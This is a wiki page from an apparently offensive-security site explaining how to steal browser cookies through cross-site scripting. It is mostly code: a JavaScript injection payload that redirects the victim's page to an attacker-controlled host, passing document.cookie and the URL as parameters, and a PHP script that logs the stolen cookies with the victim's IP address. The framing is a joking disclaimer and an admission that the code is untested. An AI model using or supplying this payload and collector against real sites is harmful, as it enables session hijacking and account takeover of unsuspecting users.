Questions about this topic? Sign up to ask in the talk tab.

Cookies/Attacks/Stealing Cookies Through XSS

From NetSec
Revision as of 06:42, 19 July 2012 by Chantal21I (Talk | contribs) (Created page with "{{quote|Remember that stealing cookies will make your friends or the grocery shop owner angry!|Savitri}} Change the current page to another location you control, using the docum...")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to: navigation, search
Savitri says
Remember that stealing cookies will make your friends or the grocery shop owner angry!

Change the current page to another location you control, using the document.cookie as parameter. Ideally make it as smooth as possible. Best option is to contaminate an iframe, and to recurse the iframe to its original contents.

<syntaxhighlight lang="javascript"> location.href = "http://my.exploit.site/steal.php?originalURL="+encodeURIComponent(location.href)+"&cookies="+encodeURIComponent(document.cookie); </syntaxhighlight>


steal.php should be something like

<syntaxhighlight lang="php"> <?php /* (c) 2011 BlackHatAcademy */ $data = urldecode($_GET['cookies']); file_put_contents("stolen_cookies.txt", "<IP>".$_SERVER['REMOTE_ADDR']."</IP><![CDATA[".$data."]]>", FILE_APPEND); echo ''; die(); ?> </syntaxhighlight>

Savitri says
This is untested. Feel free to provide a sample implementation or anything more refined.